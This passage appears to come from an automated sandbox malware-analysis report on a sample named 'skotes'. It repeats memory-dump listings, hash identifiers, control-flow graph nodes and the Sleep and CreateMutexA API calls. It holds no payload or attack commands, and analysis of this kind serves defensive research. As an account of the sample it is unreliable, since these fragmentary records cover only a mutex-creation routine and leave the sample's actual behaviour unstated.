                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225988723.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226005704.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226022713.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226039783.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226056811.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226077921.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226094470.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226109889.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226125265.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226140557.0000000000699000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226154213.000000000069A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226170008.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226194580.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226211891.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226230667.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226252851.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226275489.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226294618.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226315018.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226331084.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226352626.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226368505.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226384464.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226400933.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226416513.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226434118.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226455642.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226478790.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226571879.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226593603.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226611832.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226611832.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226656798.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226675931.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226690703.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226706831.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226722414.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226740940.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226757505.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID: T2M
                                                                                                                                                                                                                                                  • API String ID: 1464230837-1911109154
                                                                                                                                                                                                                                                  • Opcode ID: 596027880233f1251d58c380e5a5c5fe0259656e4e9e005f59586606625d308a
                                                                                                                                                                                                                                                  • Instruction ID: 77cd0a13d5bb12226cd98f4ca529f94e65a803064158259691953da9a560ec9c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 596027880233f1251d58c380e5a5c5fe0259656e4e9e005f59586606625d308a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E53129717001048BEB189B68DD88BEDB762EBC6314F248A1EE01CE73D1D77D8990875A

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 56 47a079-47a099 60 47a0c7-47a0e3 56->60 61 47a09b-47a0a7 56->61 64 47a0e5-47a0f1 60->64 65 47a111-47a130 60->65 62 47a0bd-47a0c4 call 48d663 61->62 63 47a0a9-47a0b7 61->63 62->60 63->62 68 47a930 63->68 70 47a107-47a10e call 48d663 64->70 71 47a0f3-47a101 64->71 66 47a132-47a13e 65->66 67 47a15e-47a916 call 4880c0 65->67 73 47a154-47a15b call 48d663 66->73 74 47a140-47a14e 66->74 77 47a953-47a994 Sleep CreateMutexA 68->77 78 47a930 call 4a6c6a 68->78 70->65 71->68 71->70 73->67 74->68 74->73 86 47a9a7-47a9a8 77->86 87 47a996-47a998 77->87 78->77 87->86 88 47a99a-47a9a5 87->88 88->86
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 0047A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,004D3254), ref: 0047A981
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2224996195.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2224670067.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2224996195.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225159080.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225176441.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225279090.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225572927.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225657582.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225758100.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225783831.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225840476.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225840476.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225942676.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225988723.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226005704.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226022713.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226039783.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226056811.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226077921.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226094470.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226109889.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226125265.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226140557.0000000000699000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226154213.000000000069A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226170008.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226194580.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226211891.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226230667.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226252851.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226275489.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226294618.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226315018.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226331084.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226352626.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226368505.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226384464.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226400933.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226416513.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226434118.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226455642.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226478790.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226571879.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226593603.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226611832.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226611832.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226656798.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226675931.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226690703.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226706831.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226722414.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226740940.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226757505.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID: T2M
                                                                                                                                                                                                                                                  • API String ID: 1464230837-1911109154
                                                                                                                                                                                                                                                  • Opcode ID: 2d75bbf28c1119bb163a0903d776527888fd2723877d7b499c28cb203fddb720
                                                                                                                                                                                                                                                  • Instruction ID: d9ec711f0691e619294fc4ead0c3b9f7b3c5dd73728a3be8601e636e5dd267bb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2d75bbf28c1119bb163a0903d776527888fd2723877d7b499c28cb203fddb720
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51312971B011409BEB18DB78DD89BADB762DBC6314F24CA1AE01C973D1C77E99A0871A

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 90 47a1ae-47a1ce 94 47a1d0-47a1dc 90->94 95 47a1fc-47a218 90->95 96 47a1f2-47a1f9 call 48d663 94->96 97 47a1de-47a1ec 94->97 98 47a246-47a265 95->98 99 47a21a-47a226 95->99 96->95 97->96 100 47a935 97->100 104 47a267-47a273 98->104 105 47a293-47a916 call 4880c0 98->105 102 47a23c-47a243 call 48d663 99->102 103 47a228-47a236 99->103 107 47a953-47a994 Sleep CreateMutexA 100->107 108 47a935 call 4a6c6a 100->108 102->98 103->100 103->102 111 47a275-47a283 104->111 112 47a289-47a290 call 48d663 104->112 120 47a9a7-47a9a8 107->120 121 47a996-47a998 107->121 108->107 111->100 111->112 112->105 121->120 122 47a99a-47a9a5 121->122 122->120
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 0047A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,004D3254), ref: 0047A981
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2224996195.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2224670067.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2224996195.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225159080.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225176441.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225279090.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225572927.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225657582.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225758100.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225783831.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225840476.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225840476.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225942676.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225988723.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226005704.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226022713.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226039783.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226056811.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226077921.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226094470.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226109889.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226125265.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226140557.0000000000699000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226154213.000000000069A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226170008.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226194580.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226211891.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226230667.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226252851.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226275489.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226294618.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226315018.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226331084.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226352626.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226368505.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226384464.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226400933.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226416513.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226434118.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226455642.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226478790.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226571879.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226593603.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226611832.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226611832.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226656798.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226675931.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226690703.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226706831.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226722414.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226740940.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226757505.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID: T2M
                                                                                                                                                                                                                                                  • API String ID: 1464230837-1911109154
                                                                                                                                                                                                                                                  • Opcode ID: c3b692ceb17df83cdb1718c7111e68a914f087dc411fcb63fe0c0ba99d8b716d
                                                                                                                                                                                                                                                  • Instruction ID: c6f0929b8bec3bfa22b635ca04744ceecde7819bc58177b99e8033d0122a14ff
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c3b692ceb17df83cdb1718c7111e68a914f087dc411fcb63fe0c0ba99d8b716d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB314A71B011019BEB18DB78DD8CBADB762DBC6310F20865AE018973D2D77E8990871A

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 124 47a418-47a438 128 47a466-47a482 124->128 129 47a43a-47a446 124->129 130 47a484-47a490 128->130 131 47a4b0-47a4cf 128->131 132 47a45c-47a463 call 48d663 129->132 133 47a448-47a456 129->133 134 47a4a6-47a4ad call 48d663 130->134 135 47a492-47a4a0 130->135 136 47a4d1-47a4dd 131->136 137 47a4fd-47a916 call 4880c0 131->137 132->128 133->132 138 47a93f-47a949 call 4a6c6a * 2 133->138 134->131 135->134 135->138 142 47a4f3-47a4fa call 48d663 136->142 143 47a4df-47a4ed 136->143 155 47a94e-47a994 call 4a6c6a Sleep CreateMutexA 138->155 156 47a949 call 4a6c6a 138->156 142->137 143->138 143->142 160 47a9a7-47a9a8 155->160 161 47a996-47a998 155->161 156->155 161->160 162 47a99a-47a9a5 161->162 162->160
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 0047A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,004D3254), ref: 0047A981
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2224996195.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2224670067.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2224996195.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225159080.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225176441.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225279090.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225572927.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225657582.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225758100.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225783831.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225840476.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225840476.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225942676.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225988723.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226005704.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226022713.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226039783.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226056811.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226077921.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226094470.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226109889.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226125265.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226140557.0000000000699000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226154213.000000000069A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226170008.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226194580.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226211891.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226230667.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
